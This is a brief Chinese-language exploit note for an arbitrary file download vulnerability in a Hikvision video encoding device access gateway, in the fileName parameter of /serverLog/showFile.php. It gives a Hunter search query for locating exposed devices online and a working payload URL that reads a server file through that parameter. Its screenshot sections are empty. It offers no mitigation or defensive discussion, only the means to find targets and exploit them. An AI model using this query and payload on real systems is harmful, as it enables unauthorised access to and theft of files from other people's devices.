H10-1海康威视-视频编码设备接入网关-任意文件下载

漏洞描述：

海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞

网站图片:

网络测绘:

Hunter 语法:

• hunter：web.title=“视频编码设备接入网关”&&app.name==“Hikvision 海康威视视频编码设备接入网关”

漏洞复现:

payload：

http://xx.xx.xx.xx/serverLog/showFile.php?fileName=/web/html/main.php

效果图: